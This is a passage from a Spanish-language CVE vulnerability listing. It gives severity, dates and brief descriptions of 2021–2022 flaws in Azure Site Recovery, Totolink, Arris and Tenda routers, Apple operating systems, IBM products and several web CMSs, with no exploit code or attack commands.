    Una vulnerabilidad de Elevación de Privilegios en Azure Site Recovery. Este ID de CVE es diferente de CVE-2022-24506, CVE-2022-24515, CVE-2022-24518, CVE-2022-24519
  • CVE-2022-24519
    Severidad: MEDIA
    Fecha de publicación: 09/03/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Azure Site Recovery. Este ID de CVE es diferente de CVE-2022-24469, CVE-2022-24506, CVE-2022-24515, CVE-2022-24518
  • CVE-2022-24518
    Severidad: MEDIA
    Fecha de publicación: 09/03/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Azure Site Recovery. Este ID de CVE es diferente de CVE-2022-24469, CVE-2022-24506, CVE-2022-24515, CVE-2022-24519
  • CVE-2022-24455
    Severidad: ALTA
    Fecha de publicación: 09/03/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios de Windows CD-ROM Driver
  • CVE-2022-24522
    Severidad: BAJA
    Fecha de publicación: 09/03/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Divulgación de Información en Skype Extension for Chrome
  • CVE-2022-24506
    Severidad: MEDIA
    Fecha de publicación: 09/03/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Azure Site Recovery. Este ID de CVE es diferente de CVE-2022-24469, CVE-2022-24515, CVE-2022-24518, CVE-2022-24519
  • CVE-2022-27193
    Severidad: MEDIA
    Fecha de publicación: 15/03/2022
    Fecha de última actualización: 08/08/2023
    CVRF-CSAF-Converter versiones anteriores a 1.0.0-rc2, resuelve vulnerabilidades de tipo XML External Entities (XXE). Esto conlleva a una inclusión de contenido de archivo arbitrario (local) en el documento de salida generado. Un atacante puede explotar esto para divulgar información del sistema que ejecuta el convertidor
  • CVE-2022-22344
    Severidad: MEDIA
    Fecha de publicación: 14/03/2022
    Fecha de última actualización: 08/08/2023
    IBM Spectrum Copy Data Management versiones 2.2.0.0 hasta 2.2.14.3, es vulnerable a una inyección de encabezados HTTP, causada por una comprobación inapropiada de la entrada de los encabezados HOST. Esto podría permitir a un atacante llevar a cabo varios ataques contra el sistema vulnerable, incluyendo de tipo cross-site scripting, envenenamiento de la caché o un secuestro de sesión. IBM X-Force ID: 220038
  • CVE-2022-26209
    Severidad: ALTA
    Fecha de publicación: 15/03/2022
    Fecha de última actualización: 08/08/2023
    Totolink A830R versiones V5.9c.4729_B20191112, A3100R versiones V4.1.2cu.5050_B20200504, A950RG versiones V4.1.2cu.5161_B20200903, A800R versiones V4.1.2cu.5137_B20200730, A3000RU versiones V5.9c.5185 B20201128, y A810R versiones V4.1.2cu.5182_B20201026, se ha detectado que contienen una vulnerabilidad de inyección de comando en la función setUploadSetting, por medio del parámetro FileName. Esta vulnerabilidad permite a atacantes ejecutar comandos arbitrarios por medio de una petición diseñada
  • CVE-2022-26214
    Severidad: ALTA
    Fecha de publicación: 15/03/2022
    Fecha de última actualización: 08/08/2023
    Totolink A830R versiones V5.9c.4729_B20191112, A3100R versiones V4.1.2cu.5050_B20200504, A950RG versiones V4.1.2cu.5161_B20200903, A800R versiones V4.1.2cu.5137_B20200730, A3000RU versiones V5.9c.5185 B20201128, y A810R versiones V4.1.2cu.5182_B20201026, se ha detectado que contienen una vulnerabilidad de inyección de comando en la función NTPSyncWithHost. Esta vulnerabilidad permite a atacantes ejecutar comandos arbitrarios por medio del parámetro host_time
  • CVE-2022-26213
    Severidad: ALTA
    Fecha de publicación: 15/03/2022
    Fecha de última actualización: 08/08/2023
    se ha detectado que Totolink X5000R_Firmware versión v9.1.0u.6118_B20201102, contiene una vulnerabilidad de inyección de comandos en la función setNtpCfg, por medio de los parámetros tz. Esta vulnerabilidad permite a atacantes ejecutar comandos arbitrarios por medio de una petición diseñada
  • CVE-2022-26211
    Severidad: ALTA
    Fecha de publicación: 15/03/2022
    Fecha de última actualización: 08/08/2023
    Totolink A830R versiones V5.9c.4729_B20191112, A3100R V4.1.2cu.5050_B20200504, A950RG V4.1.2cu.5161_B20200903, A800R V4.1.2cu.5137_B20200730, A3000RU V5.9c.5185_B20201128, y A810R V4.1.2cu.5182 B20201026 contienen una vulnerabilidad de inyección de comandos en la función CloudACMunualUpdate, por medio de los parámetros deviceMac y deviceName. Esta vulnerabilidad permite a atacantes ejecutar comandos arbitrarios por medio de una petición diseñada
  • CVE-2022-26212
    Severidad: ALTA
    Fecha de publicación: 15/03/2022
    Fecha de última actualización: 08/08/2023
    Totolink A830R versiones V5.9c.4729_B20191112, A3100R versiones V4.1.2cu.5050_B20200504, A950RG versiones V4.1.2cu.5161_B20200903, A800R versiones V4.1.2cu.5137_B20200730, A3000RU versiones V5.9c.5185 B20201128, y A810R versiones V4.1.2cu.5182_B20201026, se ha detectado que contienen una vulnerabilidad de inyección de comandos en la función setDeviceName, por medio de los parámetros deviceMac y deviceName. Esta vulnerabilidad permite a atacantes ejecutar comandos arbitrarios por medio de una petición diseñada
  • CVE-2022-26210
    Severidad: ALTA
    Fecha de publicación: 15/03/2022
    Fecha de última actualización: 08/08/2023
    Totolink A830R versiones V5.9c.4729_B20191112, A3100R versiones V4.1.2cu.5050_B20200504, A950RG versiones V4.1.2cu.5161_B20200903, A800R versiones V4.1.2cu.5137_B20200730, A3000RU versiones V5.9c.5185 B20201128, y A810R versiones V4.1.2cu.5182_B20201026, se ha detectado que contienen una vulnerabilidad de inyección de comandos en la función setUpgradeFW, por medio del parámetro FileName. Esta vulnerabilidad permite a atacantes ejecutar comandos arbitrarios por medio de una petición diseñada
  • CVE-2022-26207
    Severidad: ALTA
    Fecha de publicación: 15/03/2022
    Fecha de última actualización: 08/08/2023
    Totolink A830R versiones V5.9c.4729_B20191112, A3100R versiones V4.1.2cu.5050_B20200504, A950RG versiones V4.1.2cu.5161_B20200903, A800R versiones V4.1.2cu.5137_B20200730, A3000RU versiones V5.9c.5185 B20201128, y A810R versiones V4.1.2cu.5182_B20201026, se ha detectado que contienen una vulnerabilidad de inyección de comandos en la función setDiagnosisCfg, por medio del parámetro ipDoamin. Esta vulnerabilidad permite a atacantes ejecutar comandos arbitrarios por medio de una petición diseñada
  • CVE-2022-26208
    Severidad: ALTA
    Fecha de publicación: 15/03/2022
    Fecha de última actualización: 08/08/2023
    Totolink A830R versiones V5.9c.4729_B20191112, A3100R versiones V4.1.2cu.5050_B20200504, A950RG versiones V4.1.2cu.5161_B20200903, A800R versiones V4.1.2cu.5137_B20200730, A3000RU versiones V5.9c.5185 B20201128, y A810R versiones V4.1.2cu.5182_B20201026, se ha detectado que contienen una vulnerabilidad de inyección de comandos en la función setWebWlanIdx, por medio del parámetro webWlanIdx. Esta vulnerabilidad permite a atacantes ejecutar comandos arbitrarios por medio de una petición diseñada
  • CVE-2022-26206
    Severidad: ALTA
    Fecha de publicación: 15/03/2022
    Fecha de última actualización: 08/08/2023
    Totolink A830R versiones V5.9c.4729_B20191112, A3100R versiones V4.1.2cu.5050_B20200504, A950RG versiones V4.1.2cu.5161_B20200903, A800R versiones V4.1.2cu.5137_B20200730, A3000RU versiones V5.9c.5185 B20201128, y A810R versiones V4.1.2cu.5182_B20201026, se ha detectado que contienen una vulnerabilidad de inyección de comando en la función setLanguageCfg, por medio del parámetro langType. Esta vulnerabilidad permite a atacantes ejecutar comandos arbitrarios por medio de una petición diseñada
  • CVE-2022-27005
    Severidad: ALTA
    Fecha de publicación: 15/03/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que los routers Totolink s X5000R versiones V9.1.0u.6118_B20201102 y A7000R versiones V9.1.0u.6115_B20201022, contienen una vulnerabilidad de inyección de comandos en la función setWanCfg por medio del parámetro hostName. Esta vulnerabilidad permite a atacantes ejecutar comandos arbitrarios por medio de una petición diseñada
  • CVE-2022-27003
    Severidad: ALTA
    Fecha de publicación: 15/03/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que los routers Totolink s X5000R versiones V9.1.0u.6118_B20201102 y A7000R versiones V9.1.0u.6115_B20201022, contienen una vulnerabilidad de inyección de comandos en la función Tunnel 6rd por medio del parámetro relay6rd. Esta vulnerabilidad permite a atacantes ejecutar comandos arbitrarios por medio de una petición diseñada
  • CVE-2022-27004
    Severidad: ALTA
    Fecha de publicación: 15/03/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que los routers Totolink s X5000R versiones V9.1.0u.6118_B20201102 y A7000R versiones V9.1.0u.6115_B20201022, contienen una vulnerabilidad de inyección de comandos en la función Tunnel 6in4 por medio del parámetro remote6in4. Esta vulnerabilidad permite a atacantes ejecutar comandos arbitrarios por medio de una petición diseñada
  • CVE-2022-21187
    Severidad: ALTA
    Fecha de publicación: 14/03/2022
    Fecha de última actualización: 08/08/2023
    El paquete libvcs versiones anteriores a 0.11.1, es vulnerable a una Inyección de Comandos por medio de una inyección de argumentos. Cuando es llamado a la función update_repo (cuando es usado hg), el parámetro url es pasado al comando hg clone. Inyectando algunas opciones de hg era posible conseguir una ejecución arbitraria de comandos
  • CVE-2022-26994
    Severidad: ALTA
    Fecha de publicación: 15/03/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que los routers Arris SBR-AC1900P versiones 1.0.7-B05, SBR-AC3200P versiones 1.0.7-B05 y SBR-AC1200P versiones 1.0.5-B05, contienen una vulnerabilidad de inyección de comandos en la función pptp por medio de los parámetros pptpUserName y pptpPassword. Esta vulnerabilidad permite a atacantes ejecutar comandos arbitrarios por medio de una petición diseñada
  • CVE-2022-26993
    Severidad: ALTA
    Fecha de publicación: 15/03/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que los routers Arris SBR-AC1900P versiones 1.0.7-B05, SBR-AC3200P versiones 1.0.7-B05 y SBR-AC1200P versiones 1.0.5-B05, contienen una vulnerabilidad de inyección de comandos en la función pppoe por medio de los parámetros pppoeUserName, pppoePassword y pppoe_Service. Esta vulnerabilidad permite a atacantes ejecutar comandos arbitrarios por medio de una petición diseñada
  • CVE-2022-26990
    Severidad: ALTA
    Fecha de publicación: 15/03/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que los routers Arris SBR-AC1900P versiones 1.0.7-B05, SBR-AC3200P versiones 1.0.7-B05 y SBR-AC1200P versiones 1.0.5-B05, contienen una vulnerabilidad de inyección de comandos en la función firewall-local log por medio de los parámetros EmailAddress, SmtpServerName, SmtpUsername y SmtpPassword. Esta vulnerabilidad permite a atacantes ejecutar comandos arbitrarios por medio de una petición diseñada
  • CVE-2022-26991
    Severidad: ALTA
    Fecha de publicación: 15/03/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que los routers Arris SBR-AC1900P versiones 1.0.7-B05, SBR-AC3200P versiones 1.0.7-B05 y SBR-AC1200P versiones 1.0.5-B05, contienen una vulnerabilidad de inyección de comandos en la función ntp por medio del parámetro TimeZone. Esta vulnerabilidad permite a atacantes ejecutar comandos arbitrarios por medio de una petición diseñada
  • CVE-2022-26992
    Severidad: ALTA
    Fecha de publicación: 15/03/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que los routers Arris SBR-AC1900P versiones 1.0.7-B05, SBR-AC3200P versiones 1.0.7-B05 y SBR-AC1200P versiones 1.0.5-B05, contienen una vulnerabilidad de inyección de comandos en la función ddns por medio de los parámetros DdnsUserName, DdnsHostName y DdnsPassword. Esta vulnerabilidad permite a atacantes ejecutar comandos arbitrarios por medio de una petición diseñada
  • CVE-2022-25498
    Severidad: ALTA
    Fecha de publicación: 15/03/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que CuppaCMS versión v1.0 contiene una vulnerabilidad de ejecución de código remota (RCE) por medio de la función saveConfigData en el archivo /classes/ajax/Functions.php
  • CVE-2022-22612
    Severidad: MEDIA
    Fecha de publicación: 18/03/2022
    Fecha de última actualización: 08/08/2023
    Se abordó un problema de consumo de memoria con un manejo de memoria mejorado. Este problema es corregido en tvOS versión 15.4, iOS versión 15.4 y iPadOS versión 15.4, iTunes versión 12.12.3 para Windows, watchOS versión 8.5, macOS Monterey versión 12.3. El procesamiento de una imagen diseñada de forma maliciosa puede conllevar a una corrupción de la pila
  • CVE-2022-22660
    Severidad: MEDIA
    Fecha de publicación: 18/03/2022
    Fecha de última actualización: 08/08/2023
    Este problema se abordó con una nueva habilitación. Este problema es corregido en macOS Monterey versión 12.3. Una aplicación puede ser capaz de falsificar las notificaciones del sistema y la interfaz de usuario
  • CVE-2022-22653
    Severidad: MEDIA
    Fecha de publicación: 18/03/2022
    Fecha de última actualización: 08/08/2023
    Se abordó un problema de lógica con restricciones mejoradas. Este problema es corregido en iOS versión 15.4 y iPadOS versión 15.4. Un sitio web malicioso podría acceder a información sobre el usuario y sus dispositivos
  • CVE-2022-22621
    Severidad: BAJA
    Fecha de publicación: 18/03/2022
    Fecha de última actualización: 08/08/2023
    Este problema se abordó con comprobaciones mejoradas. Este problema es corregido en tvOS versión 15.4, iOS versión 15.4 y iPadOS versión 15.4, macOS Monterey versión 12.3, watchOS versión 8.5. Una persona con acceso físico a un dispositivo iOS podría visualizar información confidencial por medio de sugerencias del teclado
  • CVE-2022-22654
    Severidad: MEDIA
    Fecha de publicación: 18/03/2022
    Fecha de última actualización: 08/08/2023
    Se abordó un problema de la interfaz de usuario. Este problema es corregido en watchOS versión 8.5, Safari versión 15.4. La visita a un sitio web malicioso puede conllevar a una suplantación de la barra de direcciones
  • CVE-2022-22588
    Severidad: MEDIA
    Fecha de publicación: 18/03/2022
    Fecha de última actualización: 08/08/2023
    Se abordó un problema de agotamiento de recursos con una comprobación de entradas mejorada. Este problema es corregido en iOS versión 15.2.1 y iPadOS versión 15.2.1. El procesamiento de un nombre de accesorio de HomeKit diseñado de forma maliciosa puede causar una denegación de servicio
  • CVE-2022-25427
    Severidad: ALTA
    Fecha de publicación: 18/03/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que Tenda AC9 versión v15.03.2.21, contiene un desbordamiento de pila por medio del parámetro schedendtime en la función openSchedWifi
  • CVE-2022-25431
    Severidad: ALTA
    Fecha de publicación: 18/03/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que Tenda AC9 versión v15.03.2.21, contiene múltiples desbordamientos de pila por medio de los parámetros NPTR, V12, V10 y V11 en la función Formsetqosband
  • CVE-2022-25433
    Severidad: ALTA
    Fecha de publicación: 18/03/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que Tenda AC9 versión v15.03.2.21, contiene un desbordamiento de pila por medio del parámetro urls en la función saveparentcontrolinfo
  • CVE-2022-25434
    Severidad: ALTA
    Fecha de publicación: 18/03/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que Tenda AC9 versión v15.03.2.21, contiene un desbordamiento de pila por medio del parámetro firewallen la función SetFirewallCfg
  • CVE-2022-25428
    Severidad: ALTA
    Fecha de publicación: 18/03/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que Tenda AC9 versión v15.03.2.21, contiene un desbordamiento de pila por medio del parámetro deviceId en la función saveparentcontrolinfo
  • CVE-2022-25429
    Severidad: ALTA
    Fecha de publicación: 18/03/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que Tenda AC9 versión v15.03.2.21, contiene un desbordamiento de búfer por medio del parámetro time en la función saveparentcontrolinfo
  • CVE-2022-25435
    Severidad: ALTA
    Fecha de publicación: 18/03/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que Tenda AC9 versión v15.03.2.21, contiene un desbordamiento de pila por medio del parámetro de lista en la función SetStaticRoutecfg
  • CVE-2022-25437
    Severidad: ALTA
    Fecha de publicación: 18/03/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que Tenda AC9 versión v15.03.2.21, contiene un desbordamiento de pila por medio del parámetro list en la función SetVirtualServerCfg
  • CVE-2022-25438
    Severidad: ALTA
    Fecha de publicación: 18/03/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que Tenda AC9 versión v15.03.2.21, contiene una vulnerabilidad de Ejecución de Comandos Remota (RCE) por medio de la función SetIPTVCfg
  • CVE-2022-25439
    Severidad: ALTA
    Fecha de publicación: 18/03/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que Tenda AC9 versión v15.03.2.21, contiene un desbordamiento de pila por medio del parámetro list en la función SetIpMacBind
  • CVE-2022-25440
    Severidad: ALTA
    Fecha de publicación: 18/03/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que Tenda AC9 versión v15.03.2.21, contiene un desbordamiento de pila por medio del parámetro ntpserver en la función SetSysTimeCfg
  • CVE-2022-25441
    Severidad: ALTA
    Fecha de publicación: 18/03/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que Tenda AC9 versión v15.03.2.21, contiene una vulnerabilidad de Ejecución de Comandos Remota (RCE) por medio del parámetro vlanid en la función SetIPTVCfg
  • CVE-2021-30898
    Severidad: BAJA
    Fecha de publicación: 24/08/2021
    Fecha de última actualización: 08/08/2023
    Se ha solucionado un problema de acceso con restricciones adicionales de sandbox en aplicaciones de terceros. Este problema se ha solucionado en iOS 15 y iPadOS 15. Una aplicación maliciosa podría acceder a parte de la información del ID de Apple del usuario o a los términos de búsqueda recientes dentro de la aplicación
  • CVE-2022-26995
    Severidad: ALTA
    Fecha de publicación: 15/03/2022
    Fecha de última actualización: 08/08/2023
    se ha detectado que Arris TR3300 versión v1.0.13, contiene una vulnerabilidad de inyección de comandos en la función pptp (wan_pptp.html) por medio de los parámetros pptp_fix_ip, pptp_fix_mask, pptp_fix_gw y wan_dns1_stat. Esta vulnerabilidad permite a atacantes ejecutar comandos arbitrarios por medio de una petición diseñada
  • CVE-2022-26996
    Severidad: ALTA
    Fecha de publicación: 15/03/2022
    Fecha de última actualización: 08/08/2023
    se ha detectado que Arris TR3300 versión v1.0.13, contiene una vulnerabilidad de inyección de comandos en la función pppoe por medio de los parámetros pppoe_username, pppoe_passwd y pppoe_servicename. Esta vulnerabilidad permite a atacantes ejecutar comandos arbitrarios por medio de una petición diseñada
  • CVE-2022-26997
    Severidad: ALTA
    Fecha de publicación: 15/03/2022
    Fecha de última actualización: 08/08/2023
    se ha detectado que Arris TR3300 versión v1.0.13, contiene una vulnerabilidad de inyección de comandos en la función upnp por medio del parámetro upnp_ttl. Esta vulnerabilidad permite a atacantes ejecutar comandos arbitrarios por medio de una petición diseñada
  • CVE-2022-26998
    Severidad: ALTA
    Fecha de publicación: 15/03/2022
    Fecha de última actualización: 08/08/2023
    se ha detectado que Arris TR3300 versión v1.0.13, contiene una vulnerabilidad de inyección de comandos en la función wps setting por medio del parámetro wps_enrolee_pin. Esta vulnerabilidad permite a atacantes ejecutar comandos arbitrarios por medio de una petición diseñada
  • CVE-2022-26999
    Severidad: ALTA
    Fecha de publicación: 15/03/2022
    Fecha de última actualización: 08/08/2023
    se ha detectado que Arris TR3300 versión v1.0.13, contiene una vulnerabilidad de inyección de comandos en la función static ip settings por medio de los parámetros wan_ip_stat, wan_mask_stat, wan_gw_stat y wan_dns1_stat. Esta vulnerabilidad permite a atacantes ejecutar comandos arbitrarios por medio de una petición diseñada
  • CVE-2022-27000
    Severidad: ALTA
    Fecha de publicación: 15/03/2022
    Fecha de última actualización: 08/08/2023
    se ha detectado que Arris TR3300 versión v1.0.13, contiene una vulnerabilidad de inyección de comandos en la función time and time zone por medio de los parámetros h_primary_ntp_server, h_backup_ntp_server y h_time_zone. Esta vulnerabilidad permite a atacantes ejecutar comandos arbitrarios por medio de una petición diseñada
  • CVE-2022-27001
    Severidad: ALTA
    Fecha de publicación: 15/03/2022
    Fecha de última actualización: 08/08/2023
    se ha detectado que Arris TR3300 versión v1.0.13, contiene una vulnerabilidad de inyección de comandos en la función dhcp por medio del parámetro hostname. Esta vulnerabilidad permite a atacantes ejecutar comandos arbitrarios por medio de una petición diseñada
  • CVE-2022-22639
    Severidad: MEDIA
    Fecha de publicación: 18/03/2022
    Fecha de última actualización: 08/08/2023
    Se abordó un problema de lógica con una administración de estados mejorada. Este problema es corregido en iOS versión 15.4 y iPadOS versión 15.4, macOS Monterey versión 12.3. Una aplicación puede ser capaz de alcanzar altos privilegios
  • CVE-2022-22627
    Severidad: MEDIA
    Fecha de publicación: 18/03/2022
    Fecha de última actualización: 08/08/2023
    Se abordó una lectura fuera de límites con una comprobación de límites mejorada. Este problema es corregido en macOS Big Sur versión 11.6.5, macOS Monterey versión 12.3 y Security Update 2022-003 Catalina. El procesamiento de un binario AppleScript diseñado de forma maliciosa puede resultar en una finalización no esperada de la aplicación o la revelación de la memoria del proceso
  • CVE-2022-22652
    Severidad: BAJA
    Fecha de publicación: 18/03/2022
    Fecha de última actualización: 08/08/2023
    El panel de autenticación de la GSMA podía presentarse en la pantalla de bloqueo. El problema fue resuelto requiriendo el desbloqueo del dispositivo para interactuar con el panel de autenticación de la GSMA. Este problema es corregido en iOS versión 15.4 y iPadOS versión 15.4. Una persona con acceso físico podría visualizar y modificar la información y los ajustes de la cuenta del operador desde la pantalla de bloqueo
  • CVE-2022-24595
    Severidad: ALTA
    Fecha de publicación: 18/03/2022
    Fecha de última actualización: 08/08/2023
    Automotive Grade Linux Kooky Koi versiones 11.0.0, 11.0.1, 11.0.2, 11.0.3, 11.0.4 y 11.0.5, está afectado por un Control de Acceso Incorrecto en usr/bin/afb-daemon. Para explotar la vulnerabilidad, un atacante debe enviar una petición HTTP (o WebSocket) bien diseñada al socket escuchado por el proceso afb-daemon. No son requeridos credenciales ni interacciones del usuario
  • CVE-2022-22579
    Severidad: ALTA
    Fecha de publicación: 18/03/2022
    Fecha de última actualización: 08/08/2023
    Se abordó un problema de divulgación de información con una administración de estados mejorada. Este problema es corregido en iOS versión 15.3 y iPadOS versión 15.3, tvOS versión 15.3, Security Update 2022-001 Catalina, macOS Monterey versión 12.2, macOS Big Sur versión 11.6.3. El procesamiento de un archivo STL diseñado de forma maliciosa puede conllevar a una finalización no esperada de la aplicación o una ejecución de código arbitrario
  • CVE-2022-22622
    Severidad: BAJA
    Fecha de publicación: 18/03/2022
    Fecha de última actualización: 08/08/2023
    Este problema se abordó con comprobaciones mejoradas. Este problema es corregido en iOS versión 15.4 y iPadOS versión 15.4. Una persona con acceso físico a un dispositivo iOS podría visualizar información confidencial por medio de sugerencias del teclado
  • CVE-2022-22618
    Severidad: MEDIA
    Fecha de publicación: 18/03/2022
    Fecha de última actualización: 08/08/2023
    Este problema se abordó con comprobaciones mejoradas. Este problema es corregido en watchOS versión 8.5, iOS versión 15.4 y iPadOS versión 15.4. Un usuario puede ser capaz de omitir la solicitud de código de acceso de SOS de emergencia
  • CVE-2022-22599
    Severidad: BAJA
    Fecha de publicación: 18/03/2022
    Fecha de última actualización: 08/08/2023
    Descripción: Se abordó un problema de permisos con una comprobación mejorada. Este problema es corregido en watchOS versión 8.5, iOS versión 15.4 y iPadOS versión 15.4, macOS Big Sur versión 11.6.5, macOS Monterey versión 12.3. Una persona con acceso físico a un dispositivo puede ser capaz de usar Siri para obtener alguna información de ubicación desde la pantalla de bloqueo
  • CVE-2022-22598
    Severidad: BAJA
    Fecha de publicación: 18/03/2022
    Fecha de última actualización: 08/08/2023
    Se abordó un problema de acceso de las apps a los metadatos de la cámara con una lógica mejorada. Este problema es corregido en iOS versión 15.4 y iPadOS versión 15.4. Una aplicación puede aprender información sobre la visualización de cámara actual antes de que le sea concedido acceso a la cámara
  • CVE-2022-22578
    Severidad: ALTA
    Fecha de publicación: 18/03/2022
    Fecha de última actualización: 08/08/2023
    Se abordó un problema de lógica con una comprobación mejorada. Este problema es corregido en tvOS versión 15.3, iOS versión 15.3 y iPadOS versión 15.3, watchOS versión 8.4, macOS Monterey versión 12.2. Una aplicación maliciosa puede ser capaz de alcanzar privilegios de root
  • CVE-2022-22394
    Severidad: ALTA
    Fecha de publicación: 21/03/2022
    Fecha de última actualización: 08/08/2023
    El servidor IBM Spectrum Protect versión 8.1.14.000, podría permitir a un atacante remoto omitir las restricciones de seguridad, causado por la aplicación inapropiada de los controles de acceso. Al iniciar sesión, un atacante podría explotar esta vulnerabilidad para omitir la seguridad y conseguir acceso no autorizado de administrador o de nodo al servidor vulnerable
  • CVE-2022-24237
    Severidad: MEDIA
    Fecha de publicación: 21/03/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que el componente snaptPowered2 de Snapt Aria versión v12.8, contiene una vulnerabilidad de inyección de comandos. Esta vulnerabilidad permite a atacantes autenticados ejecutar comandos arbitrarios
  • CVE-2022-25766
    Severidad: MEDIA
    Fecha de publicación: 21/03/2022
    Fecha de última actualización: 08/08/2023
    El paquete ungit versiones anteriores a 1.5.20, es vulnerable a una Ejecución de Código Remota (RCE) por medio de la inyección de argumentos. El problema ocurre cuando es llamado al endpoint /api/fetch. Los valores controlados por el usuario (remote y ref) son pasados al comando git fetch. Inyectando algunas opciones de git era posible conseguir una ejecución arbitraria del comando
  • CVE-2022-26265
    Severidad: ALTA
    Fecha de publicación: 18/03/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que Contao Managed Edition versión v1.5.0, contiene una vulnerabilidad de ejecución de comandos remota (RCE) por medio del parámetro php_cli del componente
  • CVE-2022-26267
    Severidad: MEDIA
    Fecha de publicación: 18/03/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que Piwigo versión v12.2.0, contiene un filtrado de información por medio del parámetro action en el archivo /admin/maintenance_actions.php
  • CVE-2022-24125
    Severidad: MEDIA
    Fecha de publicación: 20/03/2022
    Fecha de última actualización: 08/08/2023
    Los servidores de matchmaking de Bandai Namco FromSoftware Dark Souls III versiones hasta 19-03-2022, permiten a atacantes remotos enviar peticiones push arbitrarias a clientes por medio de una petición RequestSendMessageToPlayers. Por ejemplo, la capacidad de enviar un mensaje push a cientos de miles de máquinas sólo está restringida en el lado del cliente, por lo que puede omitirse con un cliente modificado
  • CVE-2022-0652
    Severidad: BAJA
    Fecha de publicación: 21/03/2022
    Fecha de última actualización: 08/08/2023
    Los archivos de registro de Confd contienen hashes de contraseñas SHA512crypt de usuarios locales, incluido el root, con permisos de acceso no seguros. Esto permite a un atacante local intentar ataques de fuerza bruta fuera de línea contra estos hashes de contraseñas en Sophos UTM versiones anteriores a 9.710
  • CVE-2022-0862
    Severidad: MEDIA
    Fecha de publicación: 23/03/2022
    Fecha de última actualización: 24/07/2023
    Una vulnerabilidad de falta de protección de cambio de contraseña en una API depreciada de McAfee Enterprise ePolicy Orchestrator (ePO) versiones anteriores a la Actualización 5.10 13, permite a un atacante remoto cambiar la contraseña de una sesión comprometida sin conocer la contraseña del usuario existente. Esta funcionalidad fue eliminada de la interfaz de usuario en ePO 10 y la API ha sido deshabilitada. Se presenta otra protección para reducir la probabilidad de que esto tenga éxito mediante el envío de un enlace a un usuario conectado
  • CVE-2022-27082
    Severidad: ALTA
    Fecha de publicación: 23/03/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que Tenda M3 1.10 versión V1.0.0.12(4856), contenía una vulnerabilidad de inyección de comandos por medio del componente /goform/SetInternetLanInfo
  • CVE-2022-27083
    Severidad: ALTA
    Fecha de publicación: 23/03/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que Tenda M3 1.10 versión V1.0.0.12(4856), contiene una vulnerabilidad de inyección de comandos por medio del componente /cgi-bin/uploadAccessCodePic
  • CVE-2022-26536
    Severidad: ALTA
    Fecha de publicación: 23/03/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que Tenda M3 1.10 versión V1.0.0.12(4856), contenía una vulnerabilidad de inyección de comandos por medio del componente /goform/setFixTools
  • CVE-2022-27076
    Severidad: ALTA
    Fecha de publicación: 23/03/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que Tenda M3 1.10 versión V1.0.0.12(4856), contiene una vulnerabilidad de inyección de comandos por medio del componente /goform/delAd
  • CVE-2022-27077
    Severidad: ALTA
    Fecha de publicación: 23/03/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que Tenda M3 1.10 versión V1.0.0.12(4856), contenía una vulnerabilidad de inyección de comandos por medio del componente /cgi-bin/uploadWeiXinPic
  • CVE-2022-27078
    Severidad: ALTA
    Fecha de publicación: 23/03/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que Tenda M3 1.10 versión V1.0.0.12(4856), contenía una vulnerabilidad de inyección de comandos por medio del componente /goform/setAdInfoDetail
  • CVE-2022-27333
    Severidad: MEDIA
    Fecha de publicación: 21/03/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que idcCMS versión v1.10, contiene un problema que permite a atacantes eliminar arbitrariamente el archivo install.lock, lo que resulta en un restablecimiento de la configuración y los datos del CMS
  • CVE-2022-27079
    Severidad: ALTA
    Fecha de publicación: 23/03/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que Tenda M3 1.10 versión V1.0.0.12(4856), contenía una vulnerabilidad de inyección de comandos por medio del componente /goform/setPicListItem
  • CVE-2022-27080
    Severidad: ALTA
    Fecha de publicación: 23/03/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que Tenda M3 1.10 versión V1.0.0.12(4856), contenía una vulnerabilidad de inyección de comandos por medio del componente /goform/setWorkmode
  • CVE-2022-27081
    Severidad: ALTA
    Fecha de publicación: 23/03/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que Tenda M3 1.10 versión V1.0.0.12(4856), contenía una vulnerabilidad de inyección de comandos por medio del componente /goform/SetLanInfo
  • CVE-2022-26272
    Severidad: ALTA
    Fecha de publicación: 24/03/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de ejecución de código remota (RCE) en Ionize versión v1.0.8.1, permite a atacantes ejecutar código arbitrario por medio de una cadena diseñada escrita en el archivo application/config/config.php
  • CVE-2021-41839
    Severidad: MEDIA
    Fecha de publicación: 03/02/2022
    Fecha de última actualización: 08/08/2023
